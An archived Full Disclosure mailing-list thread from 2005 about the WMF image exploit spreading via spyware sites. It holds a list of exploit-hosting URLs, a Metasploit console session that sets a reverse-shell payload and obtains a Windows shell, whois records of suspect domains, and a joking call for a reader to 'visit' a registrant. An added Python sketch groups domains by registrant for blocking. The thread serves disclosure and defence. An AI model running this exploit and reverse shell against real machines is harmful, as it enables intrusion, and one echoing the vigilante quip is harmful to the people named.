Full Disclosure mailing list archives
Re: Someone wasted a nice bug on spyware...
From: "ad () heapoverflow com" <ad () heapoverflow com>
Date: Wed, 28 Dec 2005 23:27:35 +0100
I think you shouldn't be a security specialist for putting crackz.ws in your banned website list, hehehe, this is probably the funniest warez site around there and I bet these losers don't know the number of IE exploits they are hosting on their own domain lol...

Paul wrote:
Indeed, this is quite an annoyance. Buytoolbar.biz/xpl.wmf also works. I sent it to Microsoft a few days ago and they're looking into it. It looks like it's going to be a bad week at MSRC :(

I whoised the owners of a couple domains who host the image and got the following information:

Domain Name: BEEHAPPYY.BIZ
Domain ID: D9564716-BIZ
Sponsoring Registrar: ONLINENIC, INC. D/B/A CHINA-CHANNEL.COM
Sponsoring Registrar IANA ID: 82
Domain Status: ok
Registrant ID: OLNIC_919328_0_0
Registrant Name: Mikhail Sergeevich Gorbachev
Registrant Organization: Mikhail Sergeevich Gorbachev
Registrant Address1: Krasnaya ploshad, 1
Registrant City: Moscow
Registrant State/Province: Moscow
Registrant Postal Code: 176098
Registrant Country: Russian Federation
Registrant Country Code: RU
Registrant Phone Number: +7.0957643453
Registrant Facsimile Number: +7.0957643453
Registrant Email: mail () mailbox temp
Administrative Contact ID: OLNIC_919328_1_0
Administrative Contact Name: Mikhail Sergeevich Gorbachev
Administrative Contact Organization: Mikhail Sergeevich Gorbachev
Administrative Contact Address1: Krasnaya ploshad, 1
Administrative Contact City: Moscow
Administrative Contact State/Province: Moscow
Administrative Contact Postal Code: 176098
Administrative Contact Country: Russian Federation
Administrative Contact Country Code: RU
Administrative Contact Phone Number: +7.0957643453
Administrative Contact Facsimile Number: +7.0957643453
Administrative Contact Email: mail () mailbox temp
Billing Contact ID: OLNIC_919328_3_0
Billing Contact Name: Mikhail Sergeevich Gorbachev
Billing Contact Organization: Mikhail Sergeevich Gorbachev
Billing Contact Address1: Krasnaya ploshad, 1
Billing Contact City: Moscow
Billing Contact State/Province: Moscow
Billing Contact Postal Code: 176098
Billing Contact Country: Russian Federation
Billing Contact Country Code: RU
Billing Contact Phone Number: +7.0957643453
Billing Contact Facsimile Number: +7.0957643453
Billing Contact Email: mail () mailbox temp
Technical Contact ID: OLNIC_919328_2_0
Technical Contact Name: Mikhail Sergeevich Gorbachev
Technical Contact Organization: Mikhail Sergeevich Gorbachev
Technical Contact Address1: Krasnaya ploshad, 1
Technical Contact City: Moscow
Technical Contact State/Province: Moscow
Technical Contact Postal Code: 176098
Technical Contact Country: Russian Federation
Technical Contact Country Code: RU
Technical Contact Phone Number: +7.0957643453
Technical Contact Facsimile Number: +7.0957643453
Technical Contact Email: mail () mailbox temp
Name Server: NS1.PERLINK.BIZ
Name Server: NS2.PERLINK.BIZ
Created by Registrar: ONLINENIC, INC. D/B/A CHINA-CHANNEL.COM
Last Updated by Registrar: ONLINENIC, INC. D/B/A CHINA-CHANNEL.COM
Domain Registration Date: Tue Apr 26 15:43:16 GMT 2005
Domain Expiration Date: Wed Apr 25 23:59:59 GMT 2007
Domain Last Updated Date: Thu Aug 11 02:33:14 GMT 2005

The name Mikhail Sergeevich Gorbachev that this domain is registered to leads me to believe that it is registered with false information (for those of you who don't know, Gorbachev was a former Soviet president).

Domain Name: BUYTOOLBAR.BIZ
Domain ID: D11475548-BIZ
Sponsoring Registrar: TLDS INC.
Sponsoring Registrar IANA ID: 320
Domain Status: clientTransferProhibited
Registrant ID: 6464084-SRSPLUS
Registrant Name: Ezhi Brozkevitsh
Registrant Organization: Ezhi Brozkevitsh
Registrant Address1: Al. Armii Ludowej 24
Registrant City: Warszawa
Registrant Postal Code: 00-609
Registrant Country: Poland
Registrant Country Code: PL
Registrant Phone Number: +21.225798400
Registrant Email: admin () buytraff biz
Administrative Contact ID: 6464085-SRSPLUS
Administrative Contact Name: Ezhi Brozkevitsh
Administrative Contact Organization: Ezhi Brozkevitsh
Administrative Contact Address1: Al. Armii Ludowej 24
Administrative Contact City: Warszawa
Administrative Contact Postal Code: 00-609
Administrative Contact Country: Poland
Administrative Contact Country Code: PL
Administrative Contact Phone Number: +21.225798400
Administrative Contact Email: admin () buytraff biz
Billing Contact ID: 6464085-SRSPLUS
Billing Contact Name: Ezhi Brozkevitsh
Billing Contact Organization: Ezhi Brozkevitsh
Billing Contact Address1: Al. Armii Ludowej 24
Billing Contact City: Warszawa
Billing Contact Postal Code: 00-609
Billing Contact Country: Poland
Billing Contact Country Code: PL
Billing Contact Phone Number: +21.225798400
Billing Contact Email: admin () buytraff biz
Technical Contact ID: 6464086-SRSPLUS
Technical Contact Name: Ezhi Brozkevitsh
Technical Contact Organization: Ezhi Brozkevitsh
Technical Contact Address1: Al. Armii Ludowej 24
Technical Contact City: Warszawa
Technical Contact Postal Code: 00-609
Technical Contact Country: Poland
Technical Contact Country Code: PL
Technical Contact Phone Number: +21.225798400
Technical Contact Email: admin () buytraff biz
Name Server: NS1.BUYTOOLBAR.BIZ
Name Server: NS2.BUYTOOLBAR.BIZ
Created by Registrar: TLDS INC.
Last Updated by Registrar: TLDS INC.
Domain Registration Date: Mon Nov 14 08:00:27 GMT 2005
Domain Expiration Date: Mon Nov 13 23:59:59 GMT 2006
Domain Last Updated Date: Mon Nov 14 11:16:52 GMT 2005

This information does look promising. Iframeurl.biz is also registered to the same individual. Perhaps the Polish authorities could apprehend this culprit (either that, or a Polish reader of full-disclosure could pay him a visit ;). That is, of course, assuming he is stupid enough to use his real name to register a domain for illegal use.
Regards,
Paul
Greyhats Security
http://greyhatsecurity.org

-----Original Message-----
From: full-disclosure-bounces () lists grok org uk [mailto:full-disclosure-bounces () lists grok org uk] On Behalf Of Eric Sites
Sent: Tuesday, December 27, 2005 11:02 PM
To: full-disclosure () lists grok org uk
Subject: RE: [Full-disclosure] Someone wasted a nice bug on spyware...

We are seeing a lot of websites picking this exploit up.

Examples: DON'T CLICK
Crackz.ws
unionseek.com/d/t1/wmf_exp.htm
beehappyy.biz/parthner3/xpl.wmf
http://www.tfcco.com/xpl.wmf
Iframeurl.biz

Cheers,
Eric Sites
VP of Research & Development
Sunbelt Software
email: eric () sunbelt-software com
Voice: 1-727-562-0101 x 276
Cell: 1-727-637-2414
Fax: 1-727-562-5199
Web: http://www.sunbelt-software.com
Physical Address: 101 N Garden Ave, Suite 120, Clearwater, FL, 33755, United States

-----Original Message-----
From: full-disclosure-bounces () lists grok org uk [mailto:full-disclosure-bounces () lists grok org uk] On Behalf Of H D Moore
Sent: Tuesday, December 27, 2005 10:57 PM
To: full-disclosure () lists grok org uk
Subject: [Full-disclosure] Someone wasted a nice bug on spyware...

In reference to: http://www.securityfocus.com/archive/1/420288/30/0/threaded

I ported the exploit to the Metasploit Framework in case anyone wants to test it without installing a thousand spyware apps... Available from 'msfupdate' for MSF users, or in the 2.5 snapshot:

- http://metasploit.com/projects/Framework/exploits.html#ie_xp_pfv_metafile
- http://metasploit.com/tools/framework-2.5-snapshot.tar.gz

Tested on Win XP SP1/SP2 and Windows 2003 SP0/SP1.

-HD

+ -- --=[ msfconsole v2.5 [147 exploits - 77 payloads]

msf > use ie_xp_pfv_metafile
msf ie_xp_pfv_metafile > set PAYLOAD win32_reverse
PAYLOAD -> win32_reverse
msf ie_xp_pfv_metafile(win32_reverse) > set LHOST 192.168.0.2
LHOST -> 192.168.0.2
msf ie_xp_pfv_metafile(win32_reverse) > exploit
[*] Starting Reverse Handler.
[*] Waiting for connections to http://0.0.0.0:8080/anything.wmf
[*] HTTP Client connected from 192.168.0.219:1060 using Windows XP
[*] Got connection from 192.168.0.2:4321 <-> 192.168.0.219:1061

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\XXXX\Desktop>

On Tuesday 27 December 2005 14:20, noemailpls@noemail.ziper wrote:
Warning: the following URL successfully exploited a fully patched Windows XP system with a freshly updated Norton anti-virus. unionseek.com/d/t1/wmf_exp.htm The URL runs a .wmf and executes the virus; F-Secure will pick up the virus, Norton will not.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
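As an added example (not code from the thread or from any of its posters), the pivot Paul performs by hand, parsing whois records and grouping the hosting domains by a registrant field, so that domains sharing a registrant can be blocked or reported together. The two records are constructed from the whois output quoted above, trimmed to a few fields; the iframeurl.biz record is assumed from Paul's remark that it shares the registrant and is not quoted from the thread.

```python
import re
from collections import defaultdict

# Constructed sample: the two whois records quoted in the thread, trimmed to a few
# fields, plus an assumed iframeurl.biz record (Paul says it shares the registrant).
WHOIS_RECORDS = """\
Domain Name: BEEHAPPYY.BIZ
Sponsoring Registrar: ONLINENIC, INC. D/B/A CHINA-CHANNEL.COM
Registrant Name: Mikhail Sergeevich Gorbachev
Registrant Email: mail () mailbox temp
Name Server: NS1.PERLINK.BIZ
Name Server: NS2.PERLINK.BIZ

Domain Name: BUYTOOLBAR.BIZ
Sponsoring Registrar: TLDS INC.
Registrant Name: Ezhi Brozkevitsh
Registrant Email: admin () buytraff biz
Name Server: NS1.BUYTOOLBAR.BIZ

Domain Name: IFRAMEURL.BIZ
Sponsoring Registrar: TLDS INC.
Registrant Name: Ezhi Brozkevitsh
Registrant Email: admin () buytraff biz
Name Server: NS1.BUYTOOLBAR.BIZ
"""

FIELD_RE = re.compile(r"^([A-Za-z][A-Za-z /]*?):\s*(.*)$")

def parse_whois(text):
    """One dict per 'Domain Name:' record; repeated keys (Name Server) become lists."""
    records, current = [], None
    for line in text.splitlines():
        m = FIELD_RE.match(line.strip())
        if not m:
            continue  # blank lines and registrar boilerplate carry no field
        key, value = m.group(1).strip(), m.group(2).strip()
        if key == "Domain Name":
            current = {}  # each Domain Name line starts a new record
            records.append(current)
        if current is not None:
            current.setdefault(key, []).append(value)
    return records

def shared_registrants(records, key="Registrant Email"):
    """Group domains by one registrant field; keep only values seen on 2+ domains."""
    groups = defaultdict(set)
    for rec in records:
        for value in rec.get(key, []):
            groups[value.lower()].add(rec["Domain Name"][0].lower())
    return {k: sorted(v) for k, v in groups.items() if len(v) > 1}
```

Pivoting on "Registrant Name" or "Name Server" instead of the e-mail catches registrants who vary one field but not the others.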